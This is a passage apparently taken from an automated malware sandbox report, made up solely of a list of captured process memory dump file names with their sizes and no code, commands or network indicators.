                                                                                                                                                                                                                                                                            • memory/4016-128-0x0000000000400000-0x000000000044E000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              312KB

                                                                                                                                                                                                                                                                            • memory/4468-3-0x0000000005330000-0x0000000005331000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4468-5-0x0000000005360000-0x0000000005361000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4468-6-0x0000000005300000-0x0000000005301000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4468-2-0x0000000000790000-0x0000000000C4B000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4.7MB

                                                                                                                                                                                                                                                                            • memory/4468-1-0x0000000077516000-0x0000000077518000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                            • memory/4468-7-0x0000000005310000-0x0000000005311000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4468-4-0x0000000005320000-0x0000000005321000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4468-0-0x0000000000790000-0x0000000000C4B000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4.7MB

                                                                                                                                                                                                                                                                            • memory/4468-9-0x0000000005380000-0x0000000005381000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4468-8-0x0000000005390000-0x0000000005391000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                            • memory/4468-14-0x0000000000790000-0x0000000000C4B000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              4.7MB

                                                                                                                                                                                                                                                                            • memory/4520-174-0x0000000000C80000-0x0000000000CD2000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              328KB

                                                                                                                                                                                                                                                                            • memory/4520-265-0x0000000007A40000-0x0000000007A90000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              320KB

                                                                                                                                                                                                                                                                            • memory/4676-49-0x0000000000400000-0x000000000044C000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                            • memory/4676-51-0x0000000000400000-0x000000000044C000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              304KB

                                                                                                                                                                                                                                                                            • memory/4840-213-0x0000000000BE0000-0x0000000000C0E000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              184KB

                                                                                                                                                                                                                                                                            • memory/4968-45-0x00000000000B0000-0x0000000000102000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              328KB

                                                                                                                                                                                                                                                                            • memory/4968-46-0x0000000072ED0000-0x0000000073681000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              7.7MB

                                                                                                                                                                                                                                                                            • memory/4968-52-0x0000000002600000-0x0000000004600000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              32.0MB

                                                                                                                                                                                                                                                                            • memory/4968-53-0x0000000072ED0000-0x0000000073681000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              7.7MB

                                                                                                                                                                                                                                                                            • memory/5008-1320-0x0000000001E10000-0x00000000023F1000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              5.9MB

                                                                                                                                                                                                                                                                            • memory/5056-613-0x0000000002300000-0x0000000002351000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              324KB

                                                                                                                                                                                                                                                                            • memory/5056-567-0x0000000000400000-0x00000000005C4000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.8MB

                                                                                                                                                                                                                                                                            • memory/5056-615-0x0000000000400000-0x00000000005C4000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.8MB

                                                                                                                                                                                                                                                                            • memory/5056-610-0x0000000002300000-0x0000000002351000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              324KB